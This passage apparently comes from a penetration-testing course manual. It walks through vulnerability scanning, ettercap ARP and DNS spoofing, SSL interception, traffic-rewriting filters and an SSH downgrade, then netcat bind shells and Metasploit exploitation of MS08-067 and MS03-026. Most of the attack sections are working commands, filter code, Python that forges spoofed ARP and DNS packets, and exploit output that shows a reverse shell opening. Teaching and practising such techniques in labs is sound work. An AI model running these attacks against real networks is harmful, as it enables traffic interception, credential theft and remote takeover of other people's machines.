

10. Enter the IP address of machine or the URL of web application


11. Go to Templates. Select Full Audit without web spider

12. Click on Save and Scan

13. The scan will start


14. Once the scan is complete, go to the Vulnerabilities section to see the vulnerabilities found
by the scan.

15. You will see the details of the vulnerabilities


16. To generate reports, go to the Reports section.

17. Click on New


18. Name the report and select “Audit Report” from the report templates.

19. Select the scan under the Scope of report.

20. Click on Select Scan and select the scan you just performed


21. Click on Save and Run the report

22. The Report will be generated.


23. Click on Test Report and you will be able to view it. There are various formats of reports
that you can generate.

Nessus Vulnerability Scanner


Nessus is a proprietary, comprehensive vulnerability scanner developed by Tenable Network
Security. Nessus allows you to scan for the following types of vulnerabilities:

• Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
• Misconfiguration (e.g. open mail relay, missing patches, etc.).
• Default passwords, a few common passwords, and blank/absent passwords on some
system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary
attack.
• Denials of service against the TCP/IP stack by using malformed packets
• Preparation for PCI DSS audits
To configure Nessus, follow these steps:
1. Download Nessus from https://www.tenable.com/products/nessus/select-your-operating-system
2. After download you will need a key to activate it. Go to
https://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code
and register for the free version.
3. You must have a corporate email address in order to register. Fill in the required information
on the form. You will get an email with the key.
4. Start the installation


5. After the installation is complete it will automatically launch the browser and redirect to
a start page. If it doesn't, go to https://localhost:8834

6. Enter the username and password for the admin account (this account is created now and
used for every later login).


7. It will ask for the activation code you received by email.

8. Nessus will now take some time to finish the installation, because it downloads and
compiles the plugin set. If the plugin update fails it will prompt you to run nessuscli update.
Open a command prompt as administrator, go to the installation directory and run
nessuscli.exe update:


C:\Program Files\Tenable\Nessus>nessuscli.exe update

Restart your computer after completion

Running a Scan
1. Open a browser and go to https://localhost:8834
2. Login using the credentials you set during setup

3. You will be presented with the following screen


4. Click on New Scan. Select Basic Network Scan

5. Fill the required fields and click Save.


6. Click Launch icon

7. The scan will start

8. Click on the scan to get details


9. Click on 127.0.0.1 (the scanned host) to see its findings.

10. Once the scan is complete you can export the results in various formats. Click on Export.


11. Select a format, for example HTML, and then select Custom.

12. Click on Export.

13. You will get a report listing all the vulnerabilities found.


Module 7: ARP Spoofing


What is ARP Spoofing?


ARP spoofing is a hacking technique whereby an attacker sends fake ("spoofed") Address
Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate
the attacker's MAC address with the IP address of another host (such as the default gateway),
causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may
allow an attacker to intercept data frames on a LAN, modify the traffic, or stop the traffic
altogether. Often the attack is used as an opening for other attacks, such as denial of service,
man in the middle, or session hijacking attacks. The attack can only be used on networks that
make use of the Address Resolution Protocol (ARP), and is limited to local network segments.

Ettercap
Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It
can be used for computer network protocol analysis and security auditing. It is capable of
intercepting traffic on a network segment, capturing passwords, and conducting active
eavesdropping against a number of common protocols.

Reference: http://en.wikipedia.org/wiki/Ettercap_(computing)

1. Launch ettercap’s graphical interface in Kali Linux:


root@kali:~# ettercap -G

2. Select Sniff -> Unified Sniffing.
3. Select the network interface.
4. Select Hosts -> Scan for Hosts.
5. Select Hosts -> Host List.
6. Select the router (default gateway) in the host list and click Add to Target 1; select the
victim hosts and click Add to Target 2.
7. Verify the selection under Targets -> Current Targets.
8. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
9. Select Start -> Start Sniffing.
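The frames behind step 8, and the check a defender would run against them, as an added Python example (not part of the manual and not ettercap's code; the lab addresses and MACs are made up, and the gateway MAC is assumed known): build_arp_reply() assembles the unsolicited ARP reply that ARP poisoning consists of, poison_frames() produces the pair that “Sniff remote connections” keeps sending to the victim and to the gateway, and detect_spoofing() flags an IP address whose MAC suddenly changes, which is what tools such as arpwatch alert on.

```python
import struct

# Constructed lab values for this example (not from the manual).
ATTACKER_MAC = "00:0c:29:ab:67:5e"
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:aa:bb:cc:dd:ee"   # gateway MAC assumed known
VICTIM_IP, VICTIM_MAC = "192.168.1.150", "00:11:22:33:44:55"

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply (opcode 2). Sent unsolicited, it tells
    target_mac that sender_ip is reachable at sender_mac; the receiving OS updates
    its ARP cache without ever having asked."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # hw=Ethernet, proto=IPv4, hlen, plen, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    smac = ":".join(f"{b:02x}" for b in frame[22:28])
    sip = ".".join(str(b) for b in frame[28:32])
    return op, smac, sip


def poison_frames():
    """The pair that ettercap's ARP poisoning (arp:remote) resends every few seconds:
    the victim is told the gateway's IP lives at the attacker's MAC, and the gateway
    is told the victim's IP lives at the attacker's MAC, so both directions pass
    through the attacker."""
    return [
        build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    ]


def detect_spoofing(frames, known=None):
    """Defender's view: flag every ARP reply that changes the MAC recorded for an IP.
    `known` seeds the table with trusted static entries (the gateway at minimum);
    returns a list of (ip, expected_mac, claimed_mac)."""
    table = dict(known or {})
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        if ip in table and table[ip] != mac:
            alerts.append((ip, table[ip], mac))
        table.setdefault(ip, mac)
    return alerts


if __name__ == "__main__":
    for f in poison_frames():
        print(parse_arp(f))
    print(detect_spoofing(poison_frames(), known={GATEWAY_IP: GATEWAY_MAC}))
```

Note that detect_spoofing() with an empty baseline reports nothing: the first reply it sees for each IP is simply learned, which is exactly what the victim's ARP cache does. Detection needs a trusted mapping (a static ARP entry for the gateway, or a learned baseline taken before the attack) to compare against.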

DNS Spoofing
DNS spoofing makes a victim resolve a name to an IP address of the attacker's choosing. Against a
recursive resolver this is done by introducing forged records into the name server's cache, so that
it returns an incorrect IP address and diverts traffic to another computer (often the attacker's). On
a LAN where the victim is already ARP-poisoned it is simpler: ettercap's dns_spoof plugin sees the
victim's queries and answers them itself with the addresses configured in etter.dns, before the
legitimate reply arrives.

To conduct DNS spoofing with ettercap, follow these steps:

1. Edit the file etter.dns:

root@kali:~# nano /etc/ettercap/etter.dns

2. Add an entry for each name to spoof and the address it should resolve to (the file contains
commented examples of the format; a wildcard such as *.example.com matches every
subdomain).

3. Start ettercap.


4. Select Sniff -> Unified Sniffing.
5. Select the network interface.
6. Select Hosts -> Scan for Hosts.
7. Select Hosts -> Host List.
8. Select the router (default gateway) in the host list and click Add to Target 1; select the
victim hosts and click Add to Target 2.
9. Verify the selection under Targets -> Current Targets.
10. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
11. Select Plugins -> Manage the plugins.
12. Double click on dns_spoof to activate it.
13. Select Start -> Start Sniffing.

Alternatively you can skip steps 3 to 13 and run the whole attack from a terminal (text interface,
quiet, ARP MITM against every host on eth0, dns_spoof plugin loaded):

root@kali:~# ettercap -T -q -i eth0 -P dns_spoof -M arp /// ///
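What the dns_spoof plugin does with the etter.dns entries, as an added Python example (not ettercap's code and not from the manual; the etter.dns content, the 192.168.1.100 web server and the query are constructed): parse_etter_dns() reads the rule file including wildcards, spoofed_answer() picks the matching rule, and forge_response() builds the DNS reply sent to the victim, copying the transaction ID and the question from the query so the stub resolver accepts it. Names that match no rule return None, since ettercap forwards those queries unchanged.

```python
import fnmatch
import struct

# Constructed example of an etter.dns file (attacker web server assumed at 192.168.1.100).
ETTER_DNS = """
# name            type   value
example.com        A     192.168.1.100
*.example.com      A     192.168.1.100
"""


def parse_etter_dns(text):
    """Parse etter.dns-style lines into (name, type, value) rules; '#' starts a comment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            name, rtype, value = line.split()
            rules.append((name.lower(), rtype.upper(), value))
    return rules


def spoofed_answer(rules, qname, qtype="A"):
    """First matching rule wins; '*' in a rule name is a wildcard, as in etter.dns."""
    qname = qname.rstrip(".").lower()
    for name, rtype, value in rules:
        if rtype == qtype and fnmatch.fnmatchcase(qname, name):
            return value
    return None


def _encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(txid, qname, qtype=1):
    """A minimal DNS query, what the victim sends when it asks for an A record."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1, one question
    return header + _encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    """Transaction ID, queried name, query type and the raw question section."""
    txid = struct.unpack("!H", pkt[:2])[0]
    pos, labels = 12, []
    while pkt[pos]:
        n = pkt[pos]
        labels.append(pkt[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    pos += 1
    qtype = struct.unpack("!H", pkt[pos:pos + 2])[0]
    return txid, ".".join(labels), qtype, pkt[12:pos + 4]


def forge_response(query_pkt, rules, ttl=3600):
    """The reply dns_spoof sends: same transaction ID, same question, attacker's A record.
    Returns None when no rule matches, in which case the real reply goes through."""
    txid, qname, qtype, question = parse_query(query_pkt)
    if qtype != 1:
        return None
    ip = spoofed_answer(rules, qname, "A")
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD=1, RA=1, NOERROR
    answer = (b"\xc0\x0c"                                        # pointer to the name at offset 12
              + struct.pack("!HHIH", 1, 1, ttl, 4)                # type A, class IN, TTL, RDLENGTH
              + bytes(int(o) for o in ip.split(".")))
    return header + question + answer


def answer_ip(response):
    """The A record carried in a forged response (the last four bytes are the RDATA)."""
    return ".".join(str(b) for b in response[-4:])


if __name__ == "__main__":
    rules = parse_etter_dns(ETTER_DNS)
    reply = forge_response(build_query(0x1234, "www.example.com"), rules)
    print(answer_ip(reply))
```

The stub resolver accepts the first reply whose transaction ID and question match, which is why the forged answer has to arrive before the real one; with the victim ARP-poisoned the attacker sees the query first and can also drop the genuine reply, so the race is not a problem. A long TTL keeps the victim pinned to the attacker's address even after the MITM stops.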

SSL Man in the Middle


1. Edit “etter.conf” file.

root@kali:~# nano /etc/ettercap/etter.conf

2. Locate following lines:

[privs]

ec_uid = 65534 # nobody is the default

ec_gid = 65534 # nobody is the default

Change them to (ettercap drops to this uid/gid after start-up; it must keep root to run the
iptables redirection configured below):

[privs]

ec_uid = 0 # nobody is the default

ec_gid = 0 # nobody is the default

3. Locate the following lines in the file and uncomment them by removing the hashes, then save
and close the file:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Change them to:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

These rules let ettercap redirect the victim's port 443 traffic to its own SSL dissector, which
terminates the TLS session and opens a second one to the real server.

4. Let’s assume our target is 192.168.1.150. Run the following command (the first target is the
victim, the second, ///, is everything else including the gateway; arp:remote,oneway poisons only
the victim's view of the gateway and leaves the gateway's ARP table untouched):

root@kali:~# ettercap -Tq -i eth0 -M arp:remote,oneway /192.168.1.150// ///

5. When the victim opens an HTTPS site, ettercap presents a certificate it generated itself, so the
browser shows an untrusted-certificate warning. Credentials are only compromised if the user
clicks through that warning; browsers refuse outright for HSTS sites (including the preloaded
ones), and applications that pin their certificates will not connect at all.

Traffic Forgery
Ettercap can route traffic through itself with a man-in-the-middle attack and then apply filters
that modify the data before forwarding it to the victim. Let’s create an ettercap filter that
replaces words on a page in real time. Once the victim browses to a page, his traffic is routed
through the attacking machine and rewritten on the way.

1. Open an editor and paste the following code:


if (ip.proto == TCP && search(DATA.data, "promoted")) {
    log(DATA.data, "/tmp/mispelled_ettercap.log");
    replace("promoted", "fired");
    msg("Correctly substituted and logged.\n");
}

In the above example the word “promoted” is replaced with the word “fired”.

Or, if you would like to replace the images on a web page:

# Strip Accept-Encoding from the request (same length, so the packet size does not
# change). Without this the server answers with gzip-compressed HTML and the
# search/replace below never sees the string "img src=".
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("Modified Accept-Encoding!\n");
    }
}

# Insert our own src attribute in front of the original one; the browser keeps
# the first attribute it sees and ignores the duplicate.
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://tranchulas.com/image.png\" ");
    replace("IMG SRC=", "img src=\"http://tranchulas.com/image.png\" ");
    msg("Replaced the picture.\n");
}


2. Save it as firstfilter.filter on your Desktop.

3. Go to the Desktop directory.

root@kali:~# cd Desktop

4. Compile the filter.

root@kali:~/Desktop# etterfilter firstfilter.filter -o firstfilter.ef

5. Let’s assume our target is 192.168.1.150. Run the following command to start the attack:

root@kali:~/Desktop# ettercap -T -q -F firstfilter.ef -M arp /192.168.1.150// ///

To target all hosts on the network, use the following command:

root@kali:~/Desktop# ettercap -T -q -F firstfilter.ef -M arp /// ///

-T tells ettercap to use the text interface.
-q tells ettercap to be quiet (less verbose).
-F tells ettercap to load a compiled filter, in this case firstfilter.ef.
-M tells ettercap to activate a MITM method, here ARP poisoning.

The replace() calls only match plain text: if the page is served over HTTPS, or the server
compresses its response, the filter sees only ciphertext or gzip data and silently does nothing.
That is why the image filter above also strips Accept-Encoding from the request.

SSH Downgrade Attack

A downgrade attack is a man-in-the-middle technique that rewrites data inside packets so that
the two parties negotiate an older protocol version known to be weak. SSH is the classic example:
the attacker forces the client and the server onto the insecure SSH1 protocol. When the client
connects, the server announces which protocol versions it supports:

• ssh-2.xx: the server supports only SSH2
• ssh-1.99: the server supports both SSH1 and SSH2
• ssh-1.51: the server supports only SSH1


Let’s assume the target server announces ssh-1.99, i.e. it supports both SSH1 and SSH2, and the
client supports both but prefers SSH2. The attacker rewrites the server's banner, changing the
"1.99" string to "1.51", so the client believes the server speaks only SSH1 and logs in with SSH1.
Ettercap's SSH1 dissector can then act as a full man in the middle, substituting its own server
keys and decrypting the session, so the password is captured; it cannot do this against SSH2.
The attack needs both ends to still have SSH1 support enabled; current OpenSSH releases have
removed protocol 1 entirely.

Ettercap ships a predefined filter for the SSH downgrade attack: /usr/share/ettercap/etter.filter.ssh
on Kali (/usr/local/share/ettercap/ for a build installed from source).


1. You are not required to change anything in the file; just compile it:

root@kali:~# cd /usr/share/ettercap/
root@kali:/usr/share/ettercap# etterfilter etter.filter.ssh -o etter.ssh.ef

2. Launch ettercap (ettercap -G).
3. Select Sniff -> Unified Sniffing.
4. Select the network interface.
5. Select Hosts -> Scan for Hosts.
6. Select Hosts -> Host List.
7. Select the router (default gateway) in the host list and click Add to Target 1; select the
victim hosts and click Add to Target 2.
8. Verify the selection under Targets -> Current Targets.
9. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
10. Select Filters -> Load a filter and choose etter.ssh.ef. The filter is now loaded.
11. Select Start -> Start Sniffing.
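The banner rewrite that etter.filter.ssh performs, as an added Python example (not ettercap's filter and not from the manual; the banners are made up): downgrade_banner() is the attacker's change, client_protocol_choice() models the client's decision, and simulate() puts them together. The 1.99 to 1.51 replacement keeps the banner length unchanged, which is why a simple byte substitution works without disturbing TCP sequence numbers, and the last case shows the only real defence: a client that refuses protocol 1 outright.

```python
import re

# "SSH-<protoversion>-<softwareversion>" is the first line every SSH server sends.
BANNER_RE = re.compile(rb"^SSH-(\d+\.\d+)-(\S+)")


def downgrade_banner(server_banner):
    """Attacker's rewrite, as etter.filter.ssh does it: a server announcing 1.99
    (both protocols) is made to announce 1.51 (SSH1 only). The replacement keeps
    the length, so the TCP stream needs no sequence-number fix-up."""
    m = BANNER_RE.match(server_banner)
    if m and m.group(1) == b"1.99":
        return server_banner.replace(b"SSH-1.99-", b"SSH-1.51-", 1)
    return server_banner   # a 2.0-only server offers nothing to downgrade to


def client_protocol_choice(server_banner, allow_v1):
    """Client side of the version exchange, simplified: '2' for an SSH2-capable
    banner (2.0 or 1.99), '1' if only SSH1 is offered and the client allows it,
    'refuse' otherwise."""
    m = BANNER_RE.match(server_banner)
    if not m:
        return "refuse"
    version = m.group(1).decode()
    if version in ("2.0", "1.99"):
        return "2"
    if version.startswith("1.") and allow_v1:
        return "1"
    return "refuse"


def simulate(server_banner, mitm, allow_v1):
    """Outcome of one connection: which protocol the client ends up speaking."""
    seen = downgrade_banner(server_banner) if mitm else server_banner
    return client_protocol_choice(seen, allow_v1)


if __name__ == "__main__":
    banner = b"SSH-1.99-OpenSSH_5.3"          # constructed: a server offering both protocols
    print(simulate(banner, mitm=False, allow_v1=True))   # 2
    print(simulate(banner, mitm=True, allow_v1=True))    # 1  (downgraded)
    print(simulate(banner, mitm=True, allow_v1=False))   # refuse
```

The simulation also shows why the attack is silent from the user's point of view: the client never sees the 1.99 banner, so nothing looks unusual except the host key prompt that follows, which is the moment ettercap substitutes its own key.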


Module 8: Exploitation


Netcat
Netcat is known as the hackers’ Swiss army knife: it reads from and writes to TCP and UDP
connections. Netcat runs in two modes:

• Server (listening for a connection)
• Client (connecting to a listener)

Reverse Connections vs. Bind Connections

In a bind connection the target listens on a port and the attacker connects to it. In a reverse
connection the roles are swapped: the attacker listens and the target connects out to him (this is
what the reverse_tcp payloads later in this module do). Reverse connections are usually preferred
because inbound connections to the target are often blocked by a firewall or NAT, while outbound
connections are allowed.

Bind Connection
Ben wants Eve to help him with something, so he binds his shell to a port and Eve connects to that
port, which gives her control of his machine. Ben runs netcat on his Ubuntu machine:

tester@ubuntu:~$ nc -l -p 12345 -e /bin/bash

If you get an error, install netcat (sudo apt-get install netcat) and switch to the traditional
variant, which is the one that supports -e: run sudo update-alternatives --config nc and select
/bin/nc.traditional.
Now connect from your Kali Linux machine:

root@kali:~# nc 192.168.1.6 12345

You are now connected to the shell of the machine on which the netcat server is running. Type
whoami or any other command; it is executed on Ben's machine and the output comes back over
the connection.

Implementing Chat through Netcat

PC-1 (listens):

root@kali ~ # nc -lvvp 4444

listening on [any] 4444 ...

PC-2 (connects):

root@kali ~ # nc -vv [IP of PC1] 4444

Anything typed on either side is now sent to the other.


Metasploit
The Metasploit® Framework is a free, open source penetration testing framework developed by the
open source community and Rapid7. It can be used to test computer systems for vulnerabilities in
order to protect them, and it can be used to break into remote systems. Like many information
security tools, Metasploit can be used for both legitimate and unauthorized activities.

Interfaces
The Metasploit Framework has had the following interfaces:

• msfcli: command line interface (no longer shipped with the framework)
• msfweb: point-and-click web interface (discontinued; a web UI is now only part of Rapid7's
commercial products)
• msfconsole: all-in-one console interface, and the one used throughout this module

Steps for Exploitation

The basic steps for exploiting a system with the framework are:
1. Choosing and configuring an exploit (code that enters a target system by taking
advantage of one of its bugs; the framework ships with a large library of exploits for
Windows, Unix/Linux and Mac OS X systems);
2. Checking whether the intended target system is susceptible to the chosen exploit
(optional, via the check command);
3. Choosing and configuring a payload (code that is executed on the target system after
successful entry, for instance a remote shell or a VNC server);
4. Choosing an encoder for the payload so that an intrusion-prevention system (IPS) does
not recognise it (optional; on its own, encoding is no longer enough to evade modern
antivirus);
5. Executing the exploit.

Msfconsole
To start msfconsole run the following command:

root@kali:~# msfconsole

If msfconsole complains that it cannot connect to the database, start PostgreSQL first and retry:

root@kali:~# service postgresql start

To take a look at available exploits:



msf > show exploits

To take a look at available payloads:

msf > show payloads

Using Exploits
use exploit_name activates the exploit environment for the exploit exploit_name.

For example, to select the Microsoft RPC DCOM MS03-026 exploit, we use the following command:

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) >

You’ll notice the prompt changed from msf > to msf exploit(ms03_026_dcom) >. This shows that we
are working in the temporary environment of that exploit.
The show options command displays the various parameters which are required to use the
exploit.

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description


---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

For Microsoft RPC DCOM MS03-026 it requires two parameters: RHOST (the target's address) and
RPORT (the target's port, which defaults to 135 here). The show targets command lists all
available targets for the selected exploit module.


msf exploit(ms03_026_dcom) > show targets

Exploit targets:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

This module only has one target, a universal one that covers Windows NT 4.0 SP3-6a and all
versions of Windows 2000, XP and 2003.
The show payloads command lists all payloads that are compatible with the selected exploit; MSF
does a good job of preventing you from using the wrong payload for a given exploit.
We must set each of the options listed as 'required' before we can use this exploit. This exploit
has only a single target, so the TARGET variable can be set to 0 with the command set TARGET 0;
many exploits choose a reasonable default target for you. We now set the target server's IP
address.

msf exploit(ms03_026_dcom) > set RHOST 192.168.2.25


RHOST => 192.168.2.25
msf exploit(ms03_026_dcom) >

Next we need to set the payload (shellcode) for the exploit. Here we set PAYLOAD to
windows/shell/reverse_tcp, a staged command shell that connects back to us:

msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms03_026_dcom) >

Now we use the show options command to check which options have been set and which are
required to be set.

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description


---- --------------- -------- -----------
RHOST 192.168.2.25 yes The target address
RPORT 135 yes The target port


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) >

As we can see, we still need to supply a value for the LHOST variable. LHOST is the IP address
the payload connects back to once the exploit has run, so it must be an address of your machine
that the target can reach. To find it, run ifconfig; in the lab, use the address of the tun0 (VPN)
interface.

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.3.103 netmask 255.255.255.0 broadcast 192.168.3.255
        inet6 fe80::20c:29ff:feab:675e prefixlen 64 scopeid 0x20<link>
        ether 00:0c:29:ab:67:5e txqueuelen 1000 (Ethernet)
        RX packets 151734 bytes 205833005 (196.2 MiB)
        RX errors 2 dropped 8 overruns 0 frame 0
        TX packets 83510 bytes 12956806 (12.3 MiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
        device interrupt 19 base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1 (Local Loopback)
        RX packets 55 bytes 20670 (20.1 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 55 bytes 20670 (20.1 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
        inet 192.167.0.6 netmask 255.255.255.255 destination 192.167.0.5
        inet6 fe80::2460:bcd5:352c:daef prefixlen 64 scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
        RX packets 151185 bytes 194625218 (185.6 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 83186 bytes 5311766 (5.0 MiB)
        TX errors 0 dropped 136 overruns 0 carrier 0 collisions 0

We set it using the command:

msf exploit(ms03_026_dcom) > set LHOST 192.167.0.6


LHOST => 192.167.0.6
msf exploit(ms03_026_dcom) >

Many exploits and payloads have another set of options, called advanced options. These can be
displayed with the command show advanced. Advanced options can perform tasks such as
modifying an exploit request to avoid an IDS signature, changing brute force settings, or
specifying exact return addresses to use.
At this point, everything is ready and all variables have been set. We make a final check on the
exploit with the show options command and verify that we are good to go. The exploit or run
command actually launches the attack, doing whatever it needs to do to have the payload
executed on the remote system.

msf exploit(ms03_026_dcom) > exploit

The check command can be used to test whether the target system is vulnerable without actually
exploiting it. The check feature is not available with every exploit, but it is useful when you want
to determine whether a system is patched before trying to exploit it.

The Famous MS08-067

MS08-067 is a vulnerability in the Server service of Windows XP and Windows Server 2003 that
allows remote code execution over SMB (TCP port 445). An attacker can exploit it to gain
SYSTEM-level access to the target and perform various malicious tasks. Metasploit includes an
exploit for this vulnerability named ms08_067_netapi. We will now exploit a Windows XP machine
using this exploit.
A Windows XP machine is running at IP address 192.168.2.9.

Let’s configure the exploit. Run the following commands in msfconsole:


msf > use exploit/windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > set RHOST 192.168.2.9
RHOST => 192.168.2.9

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp


PAYLOAD => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.167.0.6


LHOST => 192.167.0.6

msf exploit(ms08_067_netapi) > run


[*] Started reverse TCP handler on 192.167.0.6:4444
[*] 192.168.2.9:445 - Automatically detecting the target...
[*] 192.168.2.9:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.2.9:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.2.9:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.9
[*] Command shell session 1 opened (192.167.0.6:4444 -> 192.168.2.9:3775) at 2017-01-01 00:54:16 -0500

Microsoft Windows XP [Version 5.1.2600]


(C) Copyright 1985-2001 Microsoft Corp.

C:\>

As we can see, we have successfully exploited the target and obtained a reverse command shell, in
which we can run OS commands:

C:\>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com


IP Address. . . . . . . . . . . . : 192.168.2.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 192.168.2.1


Password Sniffing with Metasploit

The psnuffle module passively sniffs the network for credentials and requests in clear-text
protocols (FTP, IMAP, POP3, SMB, HTTP). Using it is extremely simple: it has no options that
must be set and listens on the default interface (set INTERFACE to choose another one).

msf > use auxiliary/sniffer/psnuffle


msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
msf auxiliary(psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] HTTP GET: 192.168.3.116:1034-23.49.31.148:80 http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
[*] HTTP GET: 192.168.3.116:1035-23.99.98.228:80 http://home.microsoft.com/
[*] HTTP GET: 192.168.3.116:1036-204.79.197.203:80 http://www.msn.com/?redirfallthru=http%3a%2f%2fhome.microsoft.com%2f%3f
[*] HTTP GET: 192.168.3.116:1037-104.75.215.167:80 http://static-hp-eus.s-msn.com/en-us/homepage/_sc/css/6670b51d-8b551b9/direction=ltr.locales=en-us.themes=start.dpi=resolution1x/57-1d74af-4e3b0a9b/96-a0dfbe-ee5f2b10/4c-8d1996-baa23df0/57-f96e00-f94d3276/87-8b4d46-a648eab2/6c-0ca890-63b61fa3/ed-0da767-68ddb2ab/81-8e55d2-654638bf/finance-css-15-5ae05e329a0b7482d55ddcf5edfea1-c16bd114/finance-css-3f-ad9d0a2be5f7ee4d4f000fb0289b37-e61d2c?ver=2.0.5784.31054&fdhead=muidflt9cf,muidflt47cf,d-thshldie1,d-thshldie2&csopd=20151105080311&csopdb=20151104235550

Footprinting MySQL
Footprinting MySQL servers is very useful on an internal penetration test. MySQL listens on TCP
port 3306 by default. The mysql_version module connects to the server and reads the version it
announces in its handshake:

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 192.168.2.8
RHOSTS => 192.168.2.8
msf auxiliary(mysql_version) > run
[*] 192.168.2.8:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SMB Version Scanning

We can discover which operating systems are running in order to narrow down our attacks. Use
auxiliary/scanner/smb/smb_version against every machine in the network that has port 445 open;
it determines which version of Windows is running on a target, and which Samba version on a
Linux host.

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.2.12
RHOSTS => 192.168.2.12
msf auxiliary(smb_version) > run

